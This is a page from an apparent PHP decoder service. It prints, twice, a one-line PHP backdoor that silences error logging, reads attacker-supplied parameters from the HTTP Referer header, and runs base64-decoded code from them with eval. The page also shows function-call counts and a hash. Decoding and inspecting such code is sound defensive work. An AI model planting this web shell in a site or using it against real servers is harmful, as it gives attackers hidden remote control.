Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? ini_set('error_log', '/dev/null');parse_str($_SERVER['HTTP_REFERER'],$a);if(reset($a)=..
Decoded Output download
<? ini_set('error_log', '/dev/null');parse_str($_SERVER['HTTP_REFERER'],$a);if(reset($a)=='12' && count($a)==9) {echo '<3456>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</3456>';} ?>
Did this file decode correctly?
Original Code
<? ini_set('error_log', '/dev/null');parse_str($_SERVER['HTTP_REFERER'],$a);if(reset($a)=='12' && count($a)==9) {echo '<3456>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</3456>';} ?>
Function Calls
ini_set | 1 |
parse_str | 1 |
Stats
MD5 | 51bcf7b4921ce32444897457cb923cf0 |
Eval Count | 0 |
Decode Time | 52 ms |